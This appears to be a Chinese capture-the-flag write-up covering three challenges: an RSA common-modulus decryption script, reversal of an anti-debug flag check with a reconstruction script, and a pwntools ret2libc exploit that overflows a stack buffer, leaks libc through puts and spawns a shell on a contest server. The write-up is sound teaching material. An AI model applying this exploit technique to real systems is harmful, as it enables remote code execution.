  • 巅峰极客线上第二场部分ctf

     一、RSA

    题目给出flag1.enc、flag2.enc、pubkey1.pem、pubkey2.pem四个文件

    使用以下指令提取pem文件中的n和e

    openssl rsa -pubin -text -modulus -in pubkey1.pem

    openssl rsa -pubin -text -modulus -in pubkey2.pem

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey1.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 2333 (0x91d)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICCR0=
    -----END PUBLIC KEY-----

    得到第一个
    e:2333
    n:0xModulus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

    user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey2.pem
    Public-Key: (2048 bit)
    Modulus:
        00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
        3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
        8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
        bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
        a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
        c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
        dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
        ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
        4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
        70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
        03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
        79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
        ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
        2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
        e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
        e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
        8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
        42:17
    Exponent: 23333 (0x5b25)
    Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88
    mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2
    6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV
    0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX
    rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD
    Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC
    FwICWyU=
    -----END PUBLIC KEY-----

    得到第二个
    e:23333
    n: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

    共模攻击代码参考:http://www.freebuf.com/column/148898.html  (PS:此题还需先对两个enc文件进行base64解码,再取得密文整数)

    # -*- coding: utf-8 -*-
    
    from libnum import n2s,s2n
    from gmpy2 import invert
    import base64
    # 扩展欧几里得算法:返回 (g, x, y),满足 a*x + b*y = g = gcd(a, b)
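    def egcd(a, b):
        """Extended Euclidean algorithm.

        Returns ``(g, x, y)`` such that ``g == gcd(a, b)`` and
        ``a * x + b * y == g``. For the common-modulus attack the caller
        relies on ``g == 1`` so that ``x`` and ``y`` combine the two
        ciphertexts into ``m^1``.

        The loop form replaces the earlier recursive version: recursion
        depth there grew with the number of Euclid steps, which for
        RSA-sized operands can approach the interpreter's recursion limit.
        For non-negative inputs the returned coefficients are the same ones
        the recursive version produced.
        """
        r_prev, r = a, b
        x_prev, x = 1, 0
        y_prev, y = 0, 1
        while r:
            q = r_prev // r
            # Invariant kept on every step: a*x_prev + b*y_prev == r_prev
            r_prev, r = r, r_prev - q * r
            x_prev, x = x, x_prev - q * x
            y_prev, y = y, y_prev - q * y
        return (r_prev, x_prev, y_prev)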
    
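    def main():
        """Recover the plaintext from two ciphertexts encrypted under one modulus.

        pubkey1.pem and pubkey2.pem share the modulus printed by openssl above
        but use different exponents (2333 and 23333). With gcd(e1, e2) == 1
        and Bezout coefficients s1, s2 (e1*s1 + e2*s2 == 1), the product
        c1^s1 * c2^s2 mod n equals m. A negative coefficient is handled by
        inverting the corresponding ciphertext modulo n.

        Reads flag1.enc and flag2.enc (base64 text) from the working
        directory and prints the decoded plaintext.

        Raises:
            ValueError: if the two exponents are not coprime (the attack
                does not apply in that case).
        """
        # Shared modulus, copied from the "Modulus=" line of the openssl output.
        n = 0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
        e1 = 2333
        e2 = 23333

        # The .enc files hold base64 text, not raw ciphertext bytes; the
        # context managers close both handles even if decoding fails.
        with open('flag1.enc', 'rb') as fo1, open('flag2.enc', 'rb') as fo2:
            c1 = s2n(base64.b64decode(fo1.read()))
            c2 = s2n(base64.b64decode(fo2.read()))

        g, s1, s2 = egcd(e1, e2)
        if g != 1:
            raise ValueError('e1 and e2 must be coprime for the common-modulus attack')

        # c^s with s < 0 is computed as (c^-1)^|s| mod n.
        if s1 < 0:
            s1, c1 = -s1, invert(c1, n)
        if s2 < 0:
            s2, c2 = -s2, invert(c2, n)

        m = pow(c1, s1, n) * pow(c2, s2, n) % n
        print(n2s(m))

    if __name__ == '__main__':
        main()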

    得到flag:

    flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

    二、Antidbg

    用IDA打开后,在字符串窗口中可以看到pause

    转到对应汇编处按F5,提示positive sp value has been found。

    菜单栏 ==> Options ==> General ,把Stack Pointer勾上

    参考:https://blog.csdn.net/kendyhj9999/article/details/78175149

    在左侧出现负的sp的上一行处,按Alt + K,弹出一个窗口,在当前差异前加一个负号,单击确定。

    再次F5

    // Flag-check routine as decompiled by IDA once the stack pointer delta is fixed.
    // `input`, `a`, `dword_403018`, `dword_402138`, the `xmmword_*` constants and the
    // `sub_*` routines live in the binary; only what this listing shows is described.
    int __usercall sub_4011A0@<eax>(char a1@<sil>)
    {
      memset(input, 0, 0x32u);
      CoInitialize(0);
      // A second thread is started before the check; its body (StartAddress) is not shown here.
      CreateThread(0, 0, StartAddress, 0, 0, 0);
      // Presumably prompts and fills `input` with the candidate flag -- confirm in sub_401050.
      sub_401050((const char *)&unk_402128, (unsigned int)input);
      if ( strlen(input) == 42 )
      {
        i = 0;
        // v3..v7 appear to be one contiguous 42-byte table (16+16+4+4+2 bytes),
        // indexed below as *((char *)&v3 + i); these are the low-nibble indices.
        v3 = xmmword_4021C0;
        v5 = 34080258;
        v4 = xmmword_4021B0;
        v6 = 33882121;
        v7 = 3330;
        // Per character: the high nibble must equal dword_403018[a[i]] and the
        // low nibble must equal dword_402138[table[i]]; the loop stops at the first mismatch.
        while ( input[i] >> 4 == dword_403018[a[i]] && (input[i] & 0xF) == dword_402138[*((char *)&v3 + i)] )
        {
          if ( ++i >= 42 )
          {
            // All 42 characters matched.
            v9 = 1667462515;
            v10 = 7566181;
            goto LABEL_8;
          }
        }
        // Reached on the first mismatching character.
        LOWORD(v10) = 114;
        v9 = 1869771365;
    LABEL_8:
        // v9/v10 hold a short message for sub_401020; read as little-endian ASCII the
        // two constant pairs look like "success" and "error" -- decode to confirm.
        sub_401020(&v9, a1);
      }
      system("pause");
      return 0;
    }

    动态调试后得到dword_403018数组和dword_402138数组的值:

                

     数组a:

    v3:

    根据反汇编出来的结果可以知道:通过a数组中的值索引到403018对应的值,这是一个字符的高4位;通过数组v3中的值索引到402138对应的值,这是一个字符的低4位。(这里刚好402138中每个索引对应的值与索引本身相等,写脚本的时候就用不着把402138也列出来了)

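    # Per-character index into dword_403018 (selects the high nibble), dumped from the binary.
    a = [
        0x02, 0x02, 0x02, 0x02, 0x03, 0x01, 0x01, 0x02,
        0x01, 0x01, 0x02, 0x01, 0x01, 0x00, 0x01, 0x01,
        0x02, 0x02, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00,
        0x01, 0x01, 0x02, 0x02, 0x00, 0x01, 0x01, 0x02,
        0x02, 0x01, 0x01, 0x01, 0x01, 0x01, 0x02, 0x01,
        0x01, 0x03]

    # Contents of dword_403018 as seen under the debugger; a[i] picks one entry.
    v_3018 = [2, 3, 6, 7]

    # Per-character low nibble. dword_402138 maps every index to itself,
    # so the index table is used directly instead of a second lookup.
    v3 = [
        0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02,
        0x01, 0x06, 0x01, 0x07, 0x02, 0x0D, 0x05, 0x01,
        0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D,
        0x08, 0x08, 0x01, 0x02, 0x0D, 0x07, 0x00, 0x01,
        0x02, 0x06, 0x08, 0x02, 0x09, 0x00, 0x05, 0x02,
        0x02, 0x0D]

    # Each flag byte is (high nibble << 4) | low nibble. Both tables hold the
    # 42 entries the binary's strlen(input) == 42 check expects, so pairing
    # them with zip walks exactly one character per entry.
    flag = ''.join(chr((v_3018[hi] << 4) | lo) for hi, lo in zip(a, v3))

    print(flag)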

    得到flag:

    flag{06b16a72-51cc-4310-88ab-70ab68290e22}

    三、PWN PlainR2B

     题目给了一个pwn和一个libc.so

    F5

    // IDA decompilation of the challenge's game() routine (the vulnerable function).
    int game()
    {
      int result; // eax
      char buf; // [esp+Ch] [ebp-1Ch]  -- stack buffer only 0x1C bytes below the saved ebp
    
      puts("First, what's your name?");
      // `name` is a global; a full 20-byte read is rejected, so at most 19 bytes are kept.
      if ( read(0, &name, 0x14u) > 19 )
      {
        puts("Oh, your name too loooooong...");
        exit(0);
      }
      setbuf(stdin, 0);
      setbuf(stdout, 0);
      setbuf(stderr, 0);
      // The format string ends in '\n'; the page renders it as a literal line break.
      printf("%s, do you want to get flag?
    ", &name);
      // BUG: up to 0x34 bytes are read into buf, which sits 0x1C bytes below the saved
      // ebp (and 0x20 below the return address) -- a classic stack buffer overflow.
      // The bound should be the buffer's real size, never larger.
      read(0, &buf, 0x34u);
      // read() does not NUL-terminate buf, so strcmp may also run past it.
      if ( !strcmp(&buf, "yes") || (result = strcmp(&buf, "YES")) == 0 )
        result = printf("OK,the flag is flag{%s}, enmmm... but is true?", "WorkToWeekT_T");
      return result;
    }

    可以看到在read(0, &buf, 0x34u);处有栈溢出:buf位于ebp-0x1C,但最多可读入0x34字节,足以覆盖保存的ebp和返回地址。

    第一次把返回地址覆盖为puts,泄露libc中puts的地址并据此计算system地址,同时把puts的返回地址设为game以便重新进入;第二次再把返回地址覆盖为system。

    # pwntools script for the game() overflow shown above. Written for Python 2:
    # payloads are str and the search() generator is advanced with .next().
    from pwn import *
    #p = process('./pwn')
    p = remote('117.50.60.184', 12345)
    elf = ELF('./pwn')
    libc = ELF('./libc-2.23.so')
    
    # Offsets inside the provided libc; the runtime base is unknown until puts is leaked.
    puts_libc = libc.symbols['puts']
    system_libc = libc.symbols['system']
    binsh_libc = libc.search('/bin/sh').next()
    game = elf.symbols['game']
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    
    # Stage 1: 0x1C bytes fill buf, 4 bytes cover the saved ebp, then the return
    # address; puts@plt prints the GOT entry and returns into game() for a second round.
    payload = 'A'*0X1C + 'B'*4 + p32(puts_plt) + p32(game) + p32(puts_got) 
    
    p.recvuntil('name?')
    p.sendline('haha')
    p.recvuntil('flag?')
    p.sendline(payload)
    
    # The leaked value is puts' runtime address; the same libc build gives the other two by delta.
    p.recv(1)
    puts_addr = u32(p.recv(4))
    system_addr = puts_addr - puts_libc + system_libc
    binsh_addr = puts_addr - puts_libc + binsh_libc
    
    # Stage 2: same padding, return into system; 0xdeadbeef is system's own (unused) return address.
    payload1 = 'A'*0x1c + 'B'*4 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
    
    p.recvuntil('name?')
    p.sendline('Brian')
    p.recvuntil('flag?')
    p.sendline(payload1)
    
    p.interactive()
      
  • 原文地址:https://www.cnblogs.com/ha2ha2/p/9578106.html